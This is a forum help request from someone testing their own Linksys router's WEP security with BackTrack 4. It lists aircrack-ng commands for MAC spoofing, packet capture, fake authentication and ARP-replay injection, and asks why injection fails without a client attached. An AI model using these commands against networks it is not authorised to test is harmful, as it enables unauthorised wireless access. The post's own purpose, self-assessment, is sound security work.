Hello
I’m trying to break a wireless password so that I may show my boss how easy (or not) it is to crack. He wants to set up a wifi spot here at work and I want to make sure all the security bases are covered.
I have a Linksys WRT54G ver. 1.1 wireless router with all settings default with the exception of WEP encryption turned on. MAC address filtering is not enabled. I have a desktop computer with an Asus WL-138GE wireless nic that has a Broadcom chipset. I am running Backtrack 4 pre Final from a live CD and I’m having a problem injecting IVs. These are the commands I’m running:
- This gives me low, eth0, wmaster0 and wlan0. I assume wlan0 is the interface I’m looking for.
Code:
airmon-ng stop wlan0
- Interface wlan0 with driver “b43 – [phy0]” is reporting monitor mode disabled.
Code:
macchanger --mac 00:02:B3:EC:EE:F2 wlan0
- Spoofs the MAC to an Intel corporation. I use this because I’ve read that some routers automatically reject MACs that are not real such as 00:11:22:33:44:55
Code:
airmon-ng start wlan0
- This enables monitor mode on mon0 which is my monitoring interface
- Gives me a list of all access points. My Linksys shows up here.
Code:
airodump-ng -c 6 -w linksys.out --bssid xx:xx:xx:xx:xx:xx mon0
- Starts dumping the IVs sent to that access point to linksys.out. xx:xx:xx:xx:xx:xx is of course the access point’s MAC.
At this point I open a new konsole and leave the other one to log.
Code:
aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 -e linksys wlan0
- Attempts to authenticate/associate with the router. I get the following message when this is run:
- Sending Authentication Request (Open system) [ACK]
- Authentication successful
- Sending Association Request [ACK]
- Association successful :-) (AID: 1)
Code:
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 wlan0
- This command should start injecting IVs and my #Data should be going up in my logging screen but it isn’t. This is what I get:
- Read xxxx packets (got 0 ARP requests and 0 ACKs), sent 0 packets…(0 pps)
At this point I’ve read that this command could also work:
Code:
Aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b xx:xx:xx:xx:xx:xx –h 00:02:B3:EC:EE:F2 wlan0
- It only says Read xxx packets and my #Data does not increase
If I attach another computer to the access point and start browsing the web my #Data goes up and I can crack the key but I want to break the password without a client attached. I thought maybe injection isn’t working so I tried the following:
Code:
Aireplay-ng -9 wlan0
- It tells me injection is working and found my Linksys. With the direct probe request it gave me 30/30 100% for my Linksys.
I’ve been searching and reading the replies on this board in an attempt to try to find a solution to this problem but I haven’t come across anything that’s helped me. If anyone has any suggestions please post away. Thanks.
Problem Injecting IVs using BT4 and Asus WL-138GE
Originally Posted by Dr.Chud
Posting Permissions